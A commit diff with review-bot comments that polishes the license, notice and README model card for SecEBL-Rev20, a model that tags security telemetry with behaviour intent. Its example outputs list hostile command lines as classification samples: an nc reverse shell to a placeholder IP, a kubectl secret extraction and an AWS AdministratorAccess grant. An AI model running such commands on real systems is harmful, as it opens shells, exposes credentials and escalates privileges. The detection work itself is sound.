willchen0011 committed on
Commit 0edc8c9 · 1 Parent(s): 8ae30a3

Polish Hugging Face release docs

LICENSE CHANGED
@@ -20,10 +20,10 @@ control, are controlled by, or are under common control with that entity.
20
  "Control" means direct or indirect power to direct management, ownership of
21
  fifty percent (50%) or more of outstanding shares, or beneficial ownership.
22
 
23
- "Model Artifacts" means SecEBL-Rev20 model weights, adapters, deltas,
24
- calibration files, model configuration files, tokenizer additions, evaluation
25
- artifacts distributed with the model, and other files that are expressly marked
26
- as licensed under this license.
27
 
28
  "Derivative Model Artifacts" means modified, fine-tuned, merged, converted,
29
  quantized, distilled, adapted, or otherwise transformed versions of the Model
 
20
  "Control" means direct or indirect power to direct management, ownership of
21
  fifty percent (50%) or more of outstanding shares, or beneficial ownership.
22
 
23
+ "Model Artifacts" means SecEBL-Rev20 model weights, adapters, deltas, model
24
+ configuration files, tokenizer additions, evaluation artifacts distributed with
25
+ the model, and other files that are expressly marked as licensed under this
26
+ license.
27
 
28
  "Derivative Model Artifacts" means modified, fine-tuned, merged, converted,
29
  quantized, distilled, adapted, or otherwise transformed versions of the Model
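Review bot: The rewritten "Model Artifacts" definition (new lines 23-26) drops "calibration files" from the covered items, while NOTICE and README.md in this same commit still call the license "SecEBL Model License 1.0", so two different definition texts would circulate under one version number. Consider bumping the license version or recording the change in a dated changelog line. Any calibration file that stays in the repository or in earlier downloads is now covered only if it is "expressly marked as licensed under this license", so state whether that is intended.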
NOTICE CHANGED
@@ -1,8 +1,8 @@
1
  SecEBL-Rev20
2
  Copyright 2026 SecEBL contributors.
3
 
4
- This Hugging Face repository contains SecEBL-Rev20 model artifacts, calibration
5
- metadata, schema metadata, and an experimental L2 artifact. These model
6
  artifacts are licensed under the SecEBL Model License 1.0. See LICENSE.
7
 
8
  SecEBL-Rev20 is based on Alibaba-NLP/gte-modernbert-base, which is licensed
 
1
  SecEBL-Rev20
2
  Copyright 2026 SecEBL contributors.
3
 
4
+ This Hugging Face repository contains SecEBL-Rev20 model artifacts, schema
5
+ metadata, and an experimental L2 artifact. These model
6
  artifacts are licensed under the SecEBL Model License 1.0. See LICENSE.
7
 
8
  SecEBL-Rev20 is based on Alibaba-NLP/gte-modernbert-base, which is licensed
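Review bot: New lines 4-5 were edited without reflowing, which leaves "metadata, and an experimental L2 artifact. These model" as a short line ahead of the unchanged line 6. Reflow the paragraph so the wrap matches the rest of the file. The removal of "calibration metadata" is consistent with the LICENSE and README.md changes in this commit.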
README.md CHANGED
@@ -20,95 +20,363 @@ tags:
20
  **SecEBL** stands for **Security Event Behavior Labeler**.
21
 
22
  SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a
23
- Linux command line or normalized Kubernetes AuditLog event into explicit
24
- behavior-intent tags, so downstream detection can reason about what an actor is
25
- trying to do instead of only matching fixed strings, blacklists, allowlists, or
26
- opaque risk scores.
27
 
28
  Project repository: [github.com/EBWi11/SecEBL](https://github.com/EBWi11/SecEBL)
29
 
30
- ## Project Context
31
 
32
- Traditional intrusion-detection systems still rely heavily on blacklists,
33
- allowlists, signatures, hand-written rules, and low-explainability ML. Those
34
- tools are useful, but they struggle with living-off-the-land behavior, fast
35
- syntax drift, and multi-platform telemetry where the same behavior appears in
36
- different log shapes.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
37
 
38
- SecEBL adds an intent-detection layer. The goal is not to discard rules or
39
- policy engines, but to give them a better intermediate representation:
40
- portable, explainable behavior tags such as credential access, remote execution,
41
- persistence, data staging, cloud privilege changes, or service-health checks.
42
 
43
- The model is designed as the L1 layer of SecEBL:
44
 
45
  ```text
46
- raw security event
47
- -> L1 behavior-intent recognition
48
- -> L2 session reasoning or another downstream detector
49
- -> alert / review / policy
50
  ```
51
 
52
- L1 does not decide that a single event is an intrusion. It produces ranked,
53
- explainable behavior evidence such as `read_credential_material`,
54
- `execute_remote_command`, `create_scheduled_task`, `grant_cluster_privilege`,
55
- or `query_service_health`.
56
 
57
- ## What Is In This Model Repository
58
 
59
- This Hugging Face repository is the model artifact bundle. It intentionally does
60
- not include training corpora, full final benchmarks, private pressure-stream
61
- rows, raw run logs, or internal review files because parts of those materials
62
- contain real telemetry or real operational context.
63
 
64
  | Path | Purpose |
65
  | --- | --- |
66
  | `model.safetensors`, tokenizer/config files | SentenceTransformers-compatible SecEBL-Rev20 embedding model. |
67
- | `semantic_texts.jsonl` | Rev20 tag semantic texts used for L1 retrieval. |
68
- | `score_calibration.rev20.json` | Release calibration thresholds for tag selection. |
69
  | `schema/tags_schema_rev20.json` | Canonical Rev20 behavior vocabulary, 361 tags across 12 groups. |
70
  | `l2_artifacts/logreg.joblib` | Experimental L2 logistic-regression session scorer. |
71
- | `l2_artifacts/tag_risk_policy.rev20.json` | Matching L2 tag-selection and risk-feature policy. |
72
- | `l2_artifacts/train_summary.json` | Public aggregate L2 training/evaluation summary. |
73
  | `LICENSE`, `NOTICE` | Model license and attribution notices. |
74
 
75
- The companion GitHub release repository
76
- ([EBWi11/SecEBL](https://github.com/EBWi11/SecEBL)) contains the runnable Python
77
- helpers, public example data, and one-command smoke-test script. Download this
78
- model repository and point the GitHub helper scripts at it as `MODEL_DIR`.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
79
 
80
- ## Rev20 Vocabulary
 
 
 
 
 
 
 
81
 
82
- Rev20 is a flat behavior-tag schema:
 
 
83
 
84
  | Item | Count |
85
  | --- | ---: |
86
  | Top-level behavior groups | 12 |
87
  | Behavior tags | 361 |
88
 
89
- The vocabulary was built to represent visible behavior intent rather than final
90
- maliciousness. This makes the tags useful as an intermediate representation for
91
- rules, analyst review, session scoring, and later sequence models.
92
-
93
- ## L1 Evaluation Snapshot
94
 
95
- Current documented L1 baseline:
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
96
 
97
- ```text
98
- featurize-rev20-20260620-072423-ep128-bs112-latestdata
99
- ```
100
 
101
  | Dataset | Dynamic exact | Top5 any-hit | Top5 all-covered | Micro recall@5 |
102
  | --- | ---: | ---: | ---: | ---: |
103
- | Linux final gold | 87.32% | 98.49% | 95.44% | 96.44% |
104
- | K8s final gold | 99.31% | 100.00% | 100.00% | 100.00% |
105
  | Combined | 87.47% | 98.50% | 95.50% | 96.47% |
106
 
107
- These metrics were measured on withheld internal final-gold evaluation sets, not
108
- on the public example subset. The Linux final gold covers the full 361-tag
109
- Rev20 vocabulary and includes dense multi-tag command rows. The K8s result
110
- should be read as a small-domain sanity result because the current K8s corpus is
111
- much smaller than the Linux corpus.
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
112
 
113
  ## L2 Artifact
114
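Review bot: The added "First-Time User Path" block clones both repositories at their default branch and then runs `scripts/run_examples.sh`, which per the new text runs L2 whenever `model_artifacts/l2_artifacts/logreg.joblib` is available; a `.joblib` file is pickle-based, so loading it can run code embedded in the file. For a model aimed at security telemetry, the quick start should pin both clones to a commit or tag, publish a checksum for `logreg.joblib`, and say how to run L1 only. Smaller points in the same hunk: "Hard negatives were designed in two layers:" is followed by three bullets (schema-level, batch-level, boundary upsampling); "LOLT / living-off-the-land" looks like a transposition of the usual LOTL; and because the new text says L1 "does not apply a user-facing tag-selection threshold", the example where `nc -v 203.0.113.10 443` still scores `spawn_reverse_shell` at 0.503 needs a sentence on how consumers should read scores now that the `score_calibration.rev20.json` row is gone from the file table.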
 
@@ -116,26 +384,39 @@ This repository includes an experimental fitted L2 session scorer so the
116
  companion GitHub `scripts/run_examples.sh` can run the public Linux example
117
  sessions end to end when this model directory is used as `MODEL_DIR`.
118
 
119
- L2 consumes cached L1 `top_labels` and selected behavior tags. It does not use
120
- raw command text, user names, host names, or session ids as runtime scoring
121
- features. The included L2 artifact is a research/reproducibility component, not
122
- a general production IDS claim.
 
 
 
 
 
 
 
 
 
 
 
 
123
 
124
  Internal L2 summary:
125
 
126
  | Check | Result |
127
  | --- | ---: |
128
- | Withheld Linux final sessions | 663 sessions, 100.00% accuracy in the fitted check |
129
  | 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
130
- | OOF validation | 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |
131
 
132
  The 7M pressure-stream result was measured on real background telemetry plus
133
  embedded synthetic attack sessions. The underlying rows and real session
134
- identifiers are not redistributed.
 
135
 
136
- ## Basic Loading
137
 
138
- Load the embedding model directly with SentenceTransformers:
139
 
140
  ```python
141
  from sentence_transformers import SentenceTransformer
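Review bot: The replacement row at new line 408 reports the 663-session result as "365 TP, 298 TN, 0 FP, 0 FN" under the name "Withheld Linux session benchmark" and drops the qualifier "in the fitted check" that the removed row carried. Say explicitly whether these sessions were excluded from fitting the L2 scorer, otherwise a perfect confusion matrix reads as held-out generalization. The pressure-stream row would also be easier to interpret if it gave the number of embedded synthetic attack sessions next to "61 alert sessions".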
@@ -143,25 +424,12 @@ from sentence_transformers import SentenceTransformer
143
  model = SentenceTransformer("willchen0011/SecEBL")
144
  ```
145
 
146
- SecEBL is a retrieval-style labeler: encode the event, encode the Rev20 semantic
147
- tag texts from `semantic_texts.jsonl`, rank by cosine similarity, then apply the
148
- matching calibration thresholds. For normal use, prefer the companion GitHub
149
- helpers because they keep prompt profile, calibration, top-k saving, and L2
150
- inputs aligned.
151
-
152
- Example with the companion repository checked out next to this model snapshot:
153
-
154
- ```bash
155
- git clone https://github.com/EBWi11/SecEBL.git
156
- cd SecEBL
157
- git lfs install
158
- git clone https://huggingface.co/willchen0011/SecEBL model_artifacts
159
- scripts/run_examples.sh
160
- ```
161
-
162
- That script runs Linux and K8s public example L1 evaluation. Because this model
163
- repository includes `l2_artifacts/logreg.joblib`, it also runs the Linux public
164
- example L2 session scorer by default.
165
 
166
  ## Intended Use
167
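Review bot: The new paragraph at lines 427-432 describes direct use as encode, rank by cosine similarity, save top-k, but the Example Outputs section added in this commit says its scores are taken "after the release prompt profile", which this paragraph mentions only as something the helpers keep aligned. State that scores from direct loading are not comparable to the documented ones unless the same prompt profile is applied, and point to where that profile is defined. Since the snippet loads `willchen0011/SecEBL` by name, consider showing the `revision=` argument so readers pin the snapshot they evaluated.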
 
@@ -169,7 +437,7 @@ example L2 session scorer by default.
169
  - Internal security detection, investigation, and triage for systems an
170
  organization owns, operates, administers, or is explicitly authorized to
171
  defend.
172
- - Building session-level risk scoring over SecEBL behavior-tag streams.
173
 
174
  ## Out Of Scope
175
 
@@ -182,8 +450,8 @@ example L2 session scorer by default.
182
  ## License
183
 
184
  The model artifacts are released under **SecEBL Model License 1.0**. This is an
185
- open-weight restricted-use model license, not Apache-2.0 and not an OSI-approved
186
- open source license.
187
 
188
  The base model is `Alibaba-NLP/gte-modernbert-base`, which is Apache-2.0.
189
  Source code, schemas, public examples, and helper scripts in the companion
 
20
  **SecEBL** stands for **Security Event Behavior Labeler**.
21
 
22
  SecEBL-Rev20 is an intent-recognition model for security telemetry. It maps a
23
+ Linux command line or normalized Kubernetes AuditLog event into ranked
24
+ behavior-intent labels, so downstream detection can reason about what an actor
25
+ is trying to do instead of only matching fixed strings, allowlists, blacklists,
26
+ or opaque risk scores.
27
 
28
  Project repository: [github.com/EBWi11/SecEBL](https://github.com/EBWi11/SecEBL)
29
 
30
+ ## At A Glance
31
 
32
+ | Area | Current release summary |
33
+ | --- | --- |
34
+ | Stable public API | L1 behavior-intent labeling with ranked `top_labels`. |
35
+ | Behavior vocabulary | 361 Rev20 behavior-intent tags across 12 security behavior groups. |
36
+ | Training scale | 86,285 internal corpus rows, 82,895 usable training observations, and 118,858 effective command/tag training pairs. |
37
+ | Corpus breadth | Linux commands plus normalized Kubernetes AuditLog events, covering roughly 2,700 distinct Linux first-token/tool forms and common security/operations tooling. |
38
+ | Benchmark scale | 12,594-row internal Linux command benchmark covering all 361 behavior tags, 663 internal Linux sessions, and a 6,286,568-row / 102,117-session pressure stream. |
39
+ | L1 accuracy | 98.49% top5 any-hit and 96.44% micro recall@5 on the internal Linux command benchmark; 100.00% top5 coverage on the K8s evaluation set. |
40
+ | Inference performance | RTX 5090 spot-check: mean 5,308.72 unique cmdlines/s with FP16 + SDPA; exact raw-event cache lookup measured separately at about 1.8M rows/s. |
41
+ | Training setup | `Alibaba-NLP/gte-modernbert-base`, MNRL with hard-negative-aware batches, RTX 5090 32GB, 128 full-pass epochs, batch size 112, about 16.2 hours. |
42
+
43
+ The public examples are intentionally smaller than the internal benchmark data.
44
+ They exist so users can run the model locally and inspect outputs without access
45
+ to private telemetry. The full training corpora, internal benchmarks, private
46
+ pressure-stream rows, and private run logs are not redistributed because parts
47
+ of them contain real telemetry or real operational context.
48
+
49
+ ## First-Time User Path
50
+
51
+ Use the companion GitHub repository for the runnable code and this Hugging Face
52
+ repository for model artifacts:
53
+
54
+ ```bash
55
+ git clone https://github.com/EBWi11/SecEBL.git
56
+ cd SecEBL
57
+
58
+ git lfs install
59
+ git clone https://huggingface.co/willchen0011/SecEBL model_artifacts
60
 
61
+ pip install -e .
62
+ scripts/run_examples.sh
63
+ ```
 
64
 
65
+ After the script finishes, inspect:
66
 
67
  ```text
68
+ runs/examples/linux_l1/predictions.jsonl
69
+ runs/examples/k8s_l1/predictions.jsonl
70
+ runs/examples/l2/example_linux_session_results.json
 
71
  ```
72
 
73
+ L1 is the stable behavior-labeling API. It outputs ranked behavior evidence,
74
+ not an intrusion verdict. L2 is optional and experimental; it runs only when an
75
+ L2 artifact such as `model_artifacts/l2_artifacts/logreg.joblib` is available.
 
76
 
77
+ ## What This Repository Contains
78
 
79
+ This Hugging Face repository is the model artifact bundle.
 
 
 
80
 
81
  | Path | Purpose |
82
  | --- | --- |
83
  | `model.safetensors`, tokenizer/config files | SentenceTransformers-compatible SecEBL-Rev20 embedding model. |
84
+ | `semantic_texts.jsonl` | Rev20 semantic label texts used by the L1 retrieval path. |
 
85
  | `schema/tags_schema_rev20.json` | Canonical Rev20 behavior vocabulary, 361 tags across 12 groups. |
86
  | `l2_artifacts/logreg.joblib` | Experimental L2 logistic-regression session scorer. |
87
+ | `l2_artifacts/tag_risk_policy.rev20.json` | Matching L2 feature policy. Its tag-selection settings are internal to L2 feature extraction. |
88
+ | `l2_artifacts/train_summary.json` | Public aggregate L2 training/evaluation summary with no raw rows or real session identifiers. |
89
  | `LICENSE`, `NOTICE` | Model license and attribution notices. |
90
 
91
+ This repository does not include the runnable helper scripts. Use
92
+ [EBWi11/SecEBL](https://github.com/EBWi11/SecEBL) for the Python package, public
93
+ examples, and one-command test script.
94
+
95
+ ## Output Shape
96
+
97
+ L1 predictions expose ranked `top_labels`:
98
+
99
+ ```json
100
+ {
101
+ "observation_id": "event:0",
102
+ "command": "nc -e /bin/sh 203.0.113.10 4444",
103
+ "top_labels": [
104
+ {
105
+ "label_id": "spawn_reverse_shell",
106
+ "score": 0.811,
107
+ "axis": "execution_and_process"
108
+ },
109
+ {
110
+ "label_id": "connect_external_service",
111
+ "score": 0.488,
112
+ "axis": "network"
113
+ }
114
+ ]
115
+ }
116
+ ```
117
+
118
+ L1 does not emit `behavior_tags` and does not apply a user-facing tag-selection
119
+ threshold. `behavior_tags[]` is the field used by training and evaluation label
120
+ files. Runtime prediction output is ranked `top_labels`.
121
+
122
+ ## Why Intent Labels Matter
123
+
124
+ Traditional IDS pipelines often depend on signatures, rules, allowlists,
125
+ blacklists, and low-explainability tabular ML. Those tools still matter, but
126
+ they can struggle when legitimate tools are used in suspicious ways, when tool
127
+ syntax drifts quickly, or when the same behavior appears in different telemetry
128
+ formats.
129
+
130
+ SecEBL adds an intermediate representation:
131
+
132
+ ```text
133
+ raw security event
134
+ -> L1 behavior-intent recognition
135
+ -> L2 session reasoning or another downstream detector
136
+ -> alert / review / policy
137
+ ```
138
+
139
+ L1 intentionally does not decide that a single event is an intrusion. It
140
+ produces explainable behavior evidence such as `read_credential_material`,
141
+ `execute_remote_command`, `create_scheduled_task`, `grant_cluster_privilege`,
142
+ or `query_service_health`.
143
+
144
+ This is useful for:
145
 
146
+ - LOLT / living-off-the-land behavior where the tool is legitimate but the
147
+ behavior may be suspicious in context.
148
+ - Rule-writing lag, where new tool syntax appears faster than signatures can be
149
+ maintained.
150
+ - Multi-platform telemetry, where Linux commands, Kubernetes audit events, and
151
+ future telemetry can share a behavior vocabulary.
152
+ - Explainable detection, where an alert should be tied to explicit behavior
153
+ labels rather than only an opaque score.
154
 
155
+ ## Data And Vocabulary
156
+
157
+ Rev20 is a flat behavior-tag schema.
158
 
159
  | Item | Count |
160
  | --- | ---: |
161
  | Top-level behavior groups | 12 |
162
  | Behavior tags | 361 |
163
 
164
+ Schema groups:
 
 
 
 
165
 
166
+ | Group | Tags |
167
+ | --- | ---: |
168
+ | `observation_and_discovery` | 51 |
169
+ | `configuration_and_log_modification` | 12 |
170
+ | `filesystem_and_data` | 33 |
171
+ | `execution_and_process` | 28 |
172
+ | `network` | 51 |
173
+ | `identity_auth_and_secrets` | 31 |
174
+ | `persistence_services_and_storage` | 27 |
175
+ | `kernel_memory_and_tracing` | 14 |
176
+ | `package_build_and_source` | 19 |
177
+ | `database_and_infrastructure_services` | 33 |
178
+ | `containers_and_cloud_native` | 34 |
179
+ | `cloud_control_plane` | 28 |
180
+
181
+ The release baseline was trained from internal Rev20 corpora:
182
+
183
+ | Corpus | Rows | Unique behavior tags | Notes |
184
+ | --- | ---: | ---: | --- |
185
+ | Linux command corpus | 85,277 | 361 | Mixed generated, reviewed, and manually expanded command examples. |
186
+ | Kubernetes AuditLog corpus | 1,008 | 40 | Manually authored normalized K8s audit events. |
187
+
188
+ The Linux corpus covers roughly 2,700 distinct first-token/tool forms by a
189
+ conservative executable-name estimate. Common families include shell utilities,
190
+ network tools, package/build tools, cloud CLIs, IaC tools, container tooling,
191
+ databases, secret stores, and Kubernetes tooling. Frequent examples include
192
+ `curl`, `kubectl`, `aws`, `grep`, `cat`, `systemctl`, `find`, `ssh`, `docker`,
193
+ `git`, `redis-cli`, `journalctl`, `psql`, `gcloud`, `mysql`, `az`, `nmap`,
194
+ `vault`, and `terraform`.
195
+
196
+ Top Linux corpus tags:
197
+
198
+ | Tag | Count |
199
+ | --- | ---: |
200
+ | `stage_temporary_path` | 5,179 |
201
+ | `read_credential_material` | 4,512 |
202
+ | `read_infrastructure_config` | 3,427 |
203
+ | `upload_external_content` | 1,886 |
204
+ | `stage_hidden_path` | 1,580 |
205
+ | `search_credentials` | 1,488 |
206
+ | `modify_service_state` | 1,459 |
207
+ | `upload_sensitive_content` | 1,424 |
208
+ | `read_business_data` | 1,378 |
209
+ | `execute_remote_command` | 1,374 |
210
+
211
+ Top K8s corpus tags:
212
+
213
+ | Tag | Count |
214
+ | --- | ---: |
215
+ | `modify_workload` | 221 |
216
+ | `enumerate_cluster_resources` | 131 |
217
+ | `modify_cluster_auth_policy` | 53 |
218
+ | `modify_route` | 49 |
219
+ | `execute_in_workload` | 47 |
220
+ | `inspect_workload` | 45 |
221
+ | `grant_cluster_privilege` | 39 |
222
+ | `modify_firewall_policy` | 38 |
223
+ | `modify_verification_material` | 37 |
224
+ | `inspect_auth_policy` | 33 |
225
+
226
+ ## Training Details
227
+
228
+ The raw training corpora are not redistributed, but the following details are
229
+ documented so readers can understand the model scale and method.
230
+
231
+ | Item | Value |
232
+ | --- | --- |
233
+ | Base model | `Alibaba-NLP/gte-modernbert-base` |
234
+ | Training objective | `MultipleNegativesRankingLoss` with hard-negative-aware batches |
235
+ | Training hardware | NVIDIA GeForce RTX 5090, 32GB VRAM, `cuda:0` |
236
+ | Epochs | 128 full-pass epochs |
237
+ | Batch size | 112 |
238
+ | Precision | `fp32` |
239
+ | Steps | 1,062 steps per epoch; 135,936 total optimizer steps |
240
+ | Runtime | 58,291 seconds, about 16.2 hours |
241
+ | Sequence length | 160 tokens |
242
+ | Optimizer schedule | learning rate `2e-5`, warmup ratio `0.06`, 8,156 warmup steps, weight decay `0.01` |
243
+
244
+ Training data scale:
245
+
246
+ | Training artifact | Count | Notes |
247
+ | --- | ---: | --- |
248
+ | Combined corpus rows | 86,285 | 85,277 Linux command rows plus 1,008 K8s AuditLog rows. |
249
+ | Non-empty training observations | 82,895 | Rows with usable behavior labels after skipping 3,390 abstain rows. |
250
+ | Base command-tag pairs | 117,092 | Positive command/tag pairs before boundary upsampling. |
251
+ | Effective positive pairs | 118,858 | Final pair count after targeted boundary upsampling. |
252
+ | Behavior labels | 361 | Full Rev20 behavior vocabulary used on the label side. |
253
+
254
+ The Linux corpus is intentionally mixed rather than a single synthetic source.
255
+ The largest source slices are roughly 36.9k generated rows, 28.5k manually
256
+ reviewed rows, 4.0k benchmark-prune/migration rows, 3.6k common-difference gap
257
+ rows, 2.7k reviewed generated rows, 2.6k baseline manual rows, and 2.3k attack
258
+ batch rows, plus smaller targeted boundary, miss-review, public-attack, and
259
+ high-miss batches.
260
+
261
+ Token lengths are short enough for a compact encoder. Across the final pair set,
262
+ command-side text is p50 32 tokens, p90 55, p95 68, and p99 113; fewer than
263
+ 0.3% of examples exceed the 160-token training limit. Label-side semantic texts
264
+ are p50 40 tokens and p95 62.
265
+
266
+ Hard negatives were designed in two layers:
267
+
268
+ - Schema-level negatives: the dataset builder used `schema_hard`, with a
269
+ 16-item hard-negative pool and up to 8 negatives per positive before MNRL
270
+ batching. These negatives come from semantically nearby Rev20 tags, so the
271
+ model is forced to separate labels such as read-vs-search, inspect-vs-modify,
272
+ local-vs-remote execution, and similar tool-boundary cases.
273
+ - Batch-level negatives: the training loader used hard-negative-aware MNRL
274
+ batches. The final run used config
275
+ `rev20_conservative_20260620_ep96_miss_v11`, covering 74 difficult labels and
276
+ placing 2 hard-negative labels near each anchor where possible.
277
+ - Boundary upsampling: 1,766 boundary-sensitive pairs were duplicated once,
278
+ producing 1,766 extra training exposures. These rows target recurring failure
279
+ modes such as grep/read ambiguity, wrapper commands, tool-specific boundaries,
280
+ no-hit review cases, and post-evaluation miss-review batches.
281
+
282
+ ## Evaluation Snapshot
283
+
284
+ The internal benchmark data is not public. The aggregate size, distribution,
285
+ and metrics are public so users can understand what the headline numbers mean.
286
+
287
+ Evaluation scale:
288
+
289
+ | Dataset | Rows | Rows with labels | Behavior-tag instances | Unique behavior tags |
290
+ | --- | ---: | ---: | ---: | ---: |
291
+ | Linux internal benchmark | 12,594 | 11,889 | 17,287 | 361 / 361 |
292
+ | K8s evaluation set | 144 | 144 | 163 | 27 / 361 |
293
+ | Combined | 12,738 | 12,033 | 17,450 | 361 / 361 |
294
 
295
+ Retrieval quality:
 
 
296
 
297
  | Dataset | Dynamic exact | Top5 any-hit | Top5 all-covered | Micro recall@5 |
298
  | --- | ---: | ---: | ---: | ---: |
299
+ | Linux internal benchmark | 87.32% | 98.49% | 95.44% | 96.44% |
300
+ | K8s evaluation set | 99.31% | 100.00% | 100.00% | 100.00% |
301
  | Combined | 87.47% | 98.50% | 95.50% | 96.47% |
302
 
303
+ The Linux benchmark covers the complete 361-tag Rev20 vocabulary and includes
304
+ complex multi-tag command rows. The K8s result should be read as a small-domain
305
+ sanity result rather than broad Kubernetes coverage because the current K8s
306
+ corpus is much smaller than the Linux corpus.
307
+
308
+ Internal Linux benchmark tag cardinality:
309
+
310
+ | Tags per row | Rows |
311
+ | --- | ---: |
312
+ | 0 | 705 |
313
+ | 1 | 8,829 |
314
+ | 2 | 1,567 |
315
+ | 3 | 901 |
316
+ | 4 | 402 |
317
+ | 5 | 139 |
318
+ | 6+ | 51 |
319
+
320
+ Top internal Linux benchmark tags:
321
+
322
+ | Tag | Count |
323
+ | --- | ---: |
324
+ | `stage_temporary_path` | 987 |
325
+ | `inspect_network_state` | 801 |
326
+ | `stage_hidden_path` | 655 |
327
+ | `inspect_current_identity` | 578 |
328
+ | `read_credential_material` | 551 |
329
+ | `inspect_system_state` | 481 |
330
+ | `inspect_infrastructure_service` | 390 |
331
+ | `query_dns_records` | 372 |
332
+ | `enumerate_filesystem` | 365 |
333
+ | `search_credentials` | 315 |
334
+
335
+ ## Example Outputs
336
+
337
+ These examples show the user-facing L1 output style. Scores are cosine/retrieval
338
+ scores after the release prompt profile. The public helper scripts save top
339
+ labels in `predictions.jsonl`.
340
+
341
+ | Event | Top 3 L1 tags | Note |
342
+ | --- | --- | --- |
343
+ | `nc -e /bin/sh 203.0.113.10 4444` | <code>spawn_reverse_shell</code> 0.811<br><code>connect_external_service</code> 0.488<br><code>spawn_bind_shell</code> 0.451 | `-e` is recognized as reverse-shell execution. |
344
+ | `nc -v 203.0.113.10 443` | <code>connect_external_service</code> 0.732<br><code>spawn_reverse_shell</code> 0.503<br><code>create_reverse_tunnel</code> 0.412 | Connection intent ranks above shell-spawn intent. |
345
+ | `cat /root/install.log` | <code>read_business_log</code> 0.641<br><code>read_system_log</code> 0.431<br><code>read_workload_logs</code> 0.385 | Log-read semantics dominate. |
346
+ | `cat /root/install.conf` | <code>read_infrastructure_config</code> 0.620<br><code>read_system_config</code> 0.612<br><code>read_kernel_parameter</code> 0.336 | Config-read semantics dominate. |
347
+ | `kubectl -n prod get secret payment-api-token -o jsonpath={.data.token} \| base64 -d` | <code>read_cluster_secret</code> 0.730<br><code>decode_data</code> 0.716<br><code>read_credential_material</code> 0.363 | K8s secret extraction and decoding. |
348
+ | `aws iam attach-user-policy --user-name temp --policy-arn arn:aws:iam::aws:policy/AdministratorAccess` | <code>grant_cloud_privilege</code> 0.838<br><code>modify_cloud_identity_policy</code> 0.535<br><code>modify_cloud_identity</code> 0.459 | Cloud privilege escalation semantics. |
349
+ | `curl -fsS http://127.0.0.1:8080/healthz` | <code>query_service_health</code> 0.840<br><code>inspect_local_kubernetes_cluster</code> 0.459<br><code>inspect_container_runtime</code> 0.383 | Local service health check. |
350
+
351
+ ## Runtime Performance
352
+
353
+ SecEBL-Rev20 is a SentenceTransformers-style embedding retriever over 361 Rev20
354
+ tag definitions. The serving path embeds the event, embeds or loads tag
355
+ definition embeddings, then ranks tags by similarity.
356
+
357
+ Current single-card CUDA recommendation:
358
+
359
+ | Setting | Value |
360
+ | --- | --- |
361
+ | Precision | FP16 |
362
+ | Attention | SDPA |
363
+ | `max_seq_length` | 160 |
364
+ | Batch size | 224 default; 384 was slightly faster in one RTX 5090 sweep but not enough to replace the stable default |
365
+ | Sorting | `sort_by=char` |
366
+ | Padding | dynamic, no forced pad alignment |
367
+ | Output path | GPU tensor output plus GPU top-k |
368
+
369
+ Measured on an NVIDIA GeForce RTX 5090 32GB spot-check:
370
+
371
+ | Mode | Throughput |
372
+ | --- | ---: |
373
+ | Recommended no-cache unique inference, `bs224` | mean 5,308.72 unique cmdlines/s |
374
+ | Recommended no-cache latency, `bs224` | about 0.1884 ms per unique cmdline |
375
+ | `bs224` repeat range | 5,025.47 - 5,433.78 unique cmdlines/s |
376
+ | Best quick-sweep point, `bs384` | 5,378.45 unique cmdlines/s |
377
+
378
+ Exact raw-event cache lookup was measured separately at mean 1,817,462.76
379
+ rows/s. Cache hits reuse saved L1 top-k results and do not run model inference.
380
 
381
  ## L2 Artifact
382
 
 
384
  companion GitHub `scripts/run_examples.sh` can run the public Linux example
385
  sessions end to end when this model directory is used as `MODEL_DIR`.
386
 
387
+ In this release, a **session** is a sequence of events grouped by `session_id`.
388
+ L1 labels each event independently. L2 scores the whole session by aggregating
389
+ cached L1 ranked tags, retrieval scores, tag diversity, behavior transitions,
390
+ and routine-operation context. The L2 output is a session-level verdict such as
391
+ `intrusion` or `normal_operation`, not a replacement for per-command behavior
392
+ tags.
393
+
394
+ For compatibility with the released L2 artifact, L2 derives its session
395
+ features from cached L1 `top_labels` using an internal selected-tag feature
396
+ path. In plain terms, L2 filters the cached ranked labels inside its own feature
397
+ builder before session scoring. This does not change L1 prediction output:
398
+ users still receive ranked `top_labels`, not a selected `behavior_tags` field.
399
+
400
+ Runtime L2 does not use raw command text, user names, host names, or session ids
401
+ as scoring features. Session ids may appear in private data-prep workflows for
402
+ label assignment, but they are not runtime allow/deny lists.
403
 
404
  Internal L2 summary:
405
 
406
  | Check | Result |
407
  | --- | ---: |
408
+ | Withheld Linux session benchmark | 663 sessions, 365 TP, 298 TN, 0 FP, 0 FN |
409
  | 7M pressure-stream fit-check | 6,286,568 rows, 102,117 sessions, 61 alert sessions |
410
+ | OOF validation | 5,747 sessions, 99.39% accuracy, 96.44% attack precision, 95.31% attack recall |
411
 
412
  The 7M pressure-stream result was measured on real background telemetry plus
413
  embedded synthetic attack sessions. The underlying rows and real session
414
+ identifiers are not redistributed. The included L2 artifact is a
415
+ research/reproducibility component, not a general production IDS claim.
416
 
417
+ ## Direct SentenceTransformers Loading
418
 
419
+ You can load the embedding model directly:
420
 
421
  ```python
422
  from sentence_transformers import SentenceTransformer
 
424
  model = SentenceTransformer("willchen0011/SecEBL")
425
  ```
426
 
427
+ Direct loading gives you the encoder only. SecEBL is a retrieval-style labeler:
428
+ encode the event, encode or load the Rev20 semantic label texts from
429
+ `semantic_texts.jsonl`, rank labels by cosine similarity, and save the top-k
430
